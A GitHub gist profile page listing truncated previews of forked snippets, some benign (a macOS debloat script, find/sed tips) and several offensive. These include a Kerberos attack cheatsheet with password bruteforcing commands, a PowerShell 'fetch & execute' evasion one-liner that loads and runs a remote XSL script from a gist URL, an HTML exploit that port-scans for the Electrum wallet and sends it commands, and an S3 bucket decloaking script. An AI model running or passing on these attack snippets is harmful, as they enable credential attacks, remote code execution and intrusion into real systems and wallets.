Skip to content

Instantly share code, notes, and snippets.

View reanimat0r's full-sized avatar

Bart Black reanimat0r

View GitHub Profile
@reanimat0r
reanimat0r / cleanMacVMs.sh
Created November 18, 2024 06:54 — forked from sarthakpranesh/cleanMacVMs.sh
Debloat Mac OS ( use at your own risk )
# I use MacOS VMs from github for iOS development.
# By no suprise they are a bit slow and have a lot of things I don't use
# Hence this script for lighter and better VM for my iOS development and builds
# GUI and animation related things to tweak
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write -g QLPanelAnimationDuration -float 0
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
sudo sysctl debug.lowpri_throttle_enabled=0
@reanimat0r
reanimat0r / Find files.md
Created August 4, 2024 06:45 — forked from santisbon/Find files.md
How to find files and text in the shell and work with them. #linux #search

Assuming there's a /test folder with .txt files in it. Note how the * character is escaped to prevent expansion.

Linux and Cygwin

find /test -name \*.txt -exec sed -i 's/oldValue/newValue/g' {} \;

macOS
In sed the -i option edits files in-place instead of printing to standard output and requires a file extension.
Use "" to overwrite the file in place.

@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created February 23, 2022 12:01 — forked from S3cur3Th1sSh1t/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / PowerShell.txt
Created February 23, 2022 11:57 — forked from mgeeky/PowerShell.txt
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
==== bash ====
# bash #
## Setiing PATH ##
$ echo '''
# bash''' >> ~/.bash_profile
$ echo 'export BASH_SILENCE_DEPRECATION_WARNING=1' >> ~/.bash_profile
@reanimat0r
reanimat0r / customcsrf.py
Created November 30, 2021 11:05 — forked from fransr/customcsrf.py
Hackvertor Custom CSRF tag
import httplib
import urllib
http = httplib.HTTPSConnection('example.com', 443)
cookie = 'your=cookies';
http.request("GET", "/api/v1/csrf", "", {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'referer': 'https://example.com/',
@reanimat0r
reanimat0r / electrum.html
Created November 30, 2021 11:03 — forked from fransr/electrum.html
Simple port-scan using embed+onerror in Safari to send gui-commands to Electrum 3.0.4 without the need of any CORS-headers
<body>
<style>pre { white-space: inherit }</style>
<pre id="log"></pre>
<div id="ports" style="visibility: hidden; height: 0; width: 0;"></div>
<iframe src="about:blank" name="x" id="x" style="display: none;"></iframe>
</body>
<script>
var electrum = {
logbreak: function() { e = document.createElement('br'); document.getElementById('log').appendChild(e); },
log: function(s) { e = document.createElement('span'); e.innerText = s+" "; document.getElementById('log').appendChild(e); },
@reanimat0r
reanimat0r / bucket-disclose.sh
Created November 30, 2021 11:02 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Date : 2017/10/03
# Email : [email protected]
# Comment : to solve XDCTF-2017-WEB-Upload
import string
import itertools
import os
@reanimat0r
reanimat0r / ejs.sh
Created November 29, 2021 08:39 — forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url